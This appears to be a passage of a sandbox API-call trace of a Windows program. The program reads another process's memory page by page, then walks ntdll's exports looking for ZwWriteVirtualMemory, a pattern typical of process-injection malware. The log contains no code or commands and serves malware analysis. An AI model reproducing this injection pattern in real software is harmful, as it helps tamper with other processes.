NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2643000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2644000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2645000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2646000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2647000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2648000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2649000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x264a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x264b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x264c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x264d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x264e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.874] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x264f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2650000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2651000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2652000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2653000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2654000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2655000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.875] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2656000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2657000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2658000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2659000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x265a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x265b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x265c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.876] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x265d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x265e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x265f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x2660000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x2661000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x2662000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x2663000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.877] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x2664000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x2665000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee466000, Buffer=0x7ff8, BufferSize=0x2666000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee467000, Buffer=0x7ff8, BufferSize=0x2667000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee468000, Buffer=0x7ff8, BufferSize=0x2668000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee469000, Buffer=0x7ff8, BufferSize=0x2669000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46a000, Buffer=0x7ff8, BufferSize=0x266a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46b000, Buffer=0x7ff8, BufferSize=0x266b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.878] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46c000, Buffer=0x7ff8, BufferSize=0x266c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.879] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46d000, Buffer=0x7ff8, BufferSize=0x266d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46e000, Buffer=0x7ff8, BufferSize=0x266e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46f000, Buffer=0x7ff8, BufferSize=0x266f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee470000, Buffer=0x7ff8, BufferSize=0x2670000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee471000, Buffer=0x7ff8, BufferSize=0x2671000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee472000, Buffer=0x7ff8, BufferSize=0x2672000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee473000, Buffer=0x7ff8, BufferSize=0x2673000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.880] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee474000, Buffer=0x7ff8, BufferSize=0x2674000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee475000, Buffer=0x7ff8, BufferSize=0x2675000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee476000, Buffer=0x7ff8, BufferSize=0x2676000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee477000, Buffer=0x7ff8, BufferSize=0x2677000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.881] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee478000, Buffer=0x7ff8, BufferSize=0x2678000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.903] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwWriteVirtualMemory") returned -1 [0076.903] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgPrint", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwWriteVirtualMemory") returned -1 [0076.904] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0076.905] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0076.906] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryModuleServiceTags", 